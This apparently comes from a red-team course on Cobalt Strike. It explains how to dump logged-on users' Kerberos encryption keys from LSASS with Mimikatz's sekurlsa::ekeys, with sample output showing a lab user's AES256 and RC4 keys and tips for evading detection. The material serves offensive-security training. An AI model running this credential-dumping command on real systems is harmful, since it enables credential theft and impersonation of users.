Kerberos Encryption Keys
The sekurlsa::ekeys
Mimikatz module will dump the Kerberos encryption keys of currently logged on users. Since most modern Windows services choose to use Kerberos over NTLM, leveraging these instead of NTLM hashes makes more sense for blending into normal authentication traffic.
These keys can be used in a variety of Kerberos abuse scenarios.
This command requires elevated privileges.
\
beacon> mimikatz !sekurlsa::ekeys
Authentication Id : 0 ; 459935 (00000000:0007049f)
Session : Batch from 0
User Name : jking
Domain : DEV
Logon Server : DC-2
Logon Time : 9/1/2022 7:29:19 AM
SID : S-1-5-21-569305411-121244042-2357301523-1105
* Username : jking
* Domain : DEV.CYBERBOTIC.IO
* Password : (null)
* Key List :
aes256_hmac 4a8a74daad837ae09e9ecc8c2f1b89f960188cb934db6d4bbebade8318ae57c6
rc4_hmac_nt 59fc0f884922b4ce376051134c71e22c
rc4_hmac_old 59fc0f884922b4ce376051134c71e22c
rc4_md4 59fc0f884922b4ce376051134c71e22c
rc4_hmac_nt_exp 59fc0f884922b4ce376051134c71e22c
rc4_hmac_old_exp 59fc0f884922b4ce376051134c71e22c
\
There is a known issue where Mimikatz may incorrectly label all of the hashes as des_cbc_md4
.
\
In this case, the AES256 key is the one we want. These hashes are not automatically populated into the Credential data model, but they can be added manually via View > Credentials > Add.
\
OPSEC This module also opens a read handle to LSASS.
Last updated